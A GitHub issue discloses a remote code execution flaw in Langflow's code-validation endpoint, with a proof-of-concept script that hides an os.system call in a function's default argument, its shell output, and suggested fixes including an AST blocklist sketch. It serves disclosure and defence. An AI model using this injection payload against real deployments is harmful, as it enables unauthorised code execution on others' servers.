Code injection by API api/v1/validate/code which can lead to code execution #696

Closed
Lyutoon opened this issue Jul 28, 2023 · 3 comments
Labels: bug, help wanted, stale

Comments


Lyutoon commented Jul 28, 2023

Describe the bug
As defined in the source code, the api/v1/validate/code endpoint validates the submitted code and returns the validation result. When the validator walks the parsed AST and reaches a node where isinstance(node, ast.FunctionDef) is true, that branch calls exec on the function definition.

However, the exec call can be triggered through a function's default parameter value, which is evaluated when the definition is executed, leading to arbitrary code execution.

Since this is a public API, an attacker can achieve remote code execution against any publicly reachable deployment simply by calling the endpoint with a crafted snippet, or even open a reverse shell.
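
For context, the vulnerable pattern looks roughly like this (a minimal sketch of the behaviour described above, not Langflow's exact source; the validate_code name and error structure here are assumptions):

import ast

def validate_code(code: str) -> dict:
    # Sketch only: mirrors the described behaviour, not the real implementation.
    errors = {"imports": {"errors": []}, "function": {"errors": []}}
    tree = ast.parse(code)
    for node in tree.body:
        if isinstance(node, ast.FunctionDef):
            # Executing the compiled definition evaluates its default argument
            # values, so a payload placed in a default runs right here.
            module = ast.Module(body=[node], type_ignores=[])
            exec(compile(module, "<string>", "exec"))
    return errors

Executing a def statement always evaluates its default values first, which is exactly what the PoC below exploits.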

To Reproduce
Here is the PoC:

from fastapi.testclient import TestClient

def client():
    from langflow.main import create_app

    app = create_app()

    with TestClient(app) as client:
        return client

def test_post_validate_code(client: TestClient, code):
    # Post the snippet to the public validation endpoint; the payload hidden in
    # the default argument is executed server-side during "validation".
    response1 = client.post("api/v1/validate/code", json={"code": code})
    print(response1.json())
    assert response1.status_code == 200
    assert response1.json() == {"imports": {"errors": []}, "function": {"errors": []}}

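# Malicious payload: the default value runs `ls` as soon as the definition is executed.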
code = """
def x(y=eval('__import__("os").system("ls")')):
    pass
"""

test_post_validate_code(client(), code)

Shell Log

➜  langflow python3 langflow_poc.py
langflow.db	langflow_poc.py	logs
{'imports': {'errors': []}, 'function': {'errors': []}}
ogabrielluiz added the bug and help wanted labels on Aug 4, 2023
@ogabrielluiz
Contributor

Hi! What are your suggestions on this?

Sandboxing is out of reach for an open-source project like this (for now at least). I think we can test some options such as literal_eval but I'm not sure it is going to have the same result. What do you think?
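
For what it's worth, ast.literal_eval only evaluates literal expressions, so it would reject the payload outright but also cannot evaluate a function definition at all; a quick illustration using only the standard library:

import ast

# literal_eval accepts only literal structures (strings, numbers, tuples, lists,
# dicts, sets, booleans, None), so the PoC payload is rejected, not executed.
try:
    ast.literal_eval("__import__('os').system('ls')")
except ValueError as err:
    print("rejected:", err)

# It also cannot evaluate a def statement, which is why it would not produce
# the same kind of result as the current exec-based validation.
try:
    ast.literal_eval("def x(y=1):\n    pass")
except SyntaxError as err:
    print("rejected:", type(err).__name__)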


stale bot commented Sep 18, 2023

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

stale bot added the stale label on Sep 18, 2023
stale bot closed this as completed on Sep 25, 2023
Lyutoon (Author) commented May 8, 2024

Hi! Sorry for the late reply...
My suggestions are:

  1. Add a lightweight, AST-based sandbox that traverses all nodes and filters out malicious ones, such as imports and calls to dangerous functions (see the sketch below).
  2. Replace the exec call with literal_eval.
  3. Add a warning to this API's documentation stating that it should not be directly reachable by arbitrary users and is used at the caller's own risk.

Thanks! Hope these suggestions help.
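
A minimal sketch of what the AST-based check in suggestion 1 could look like (the check_code helper and its blocklist are hypothetical, not a proposed Langflow patch); it syntax-checks the code with compile but never executes it:

import ast

# Hypothetical, non-exhaustive blocklist of names whose calls are refused.
DANGEROUS_CALLS = {"eval", "exec", "__import__", "compile", "open", "system"}

def check_code(code: str) -> list:
    """Syntax-check `code` without executing it and report suspicious nodes."""
    try:
        tree = ast.parse(code)
    except SyntaxError as err:
        return [f"syntax error: {err}"]
    errors = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            errors.append(f"import not allowed at line {node.lineno}")
        elif isinstance(node, ast.Call):
            func = node.func
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
            if name in DANGEROUS_CALLS:
                errors.append(f"call to {name!r} not allowed at line {node.lineno}")
    # compile() confirms the code is well-formed but does not run it.
    compile(tree, "<submitted code>", "exec")
    return errors

# The PoC payload is flagged instead of executed:
print(check_code('def x(y=eval(\'__import__("os").system("ls")\')):\n    pass'))

Whether imports should be blocked at all is of course a policy decision, since legitimate custom components do import modules.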
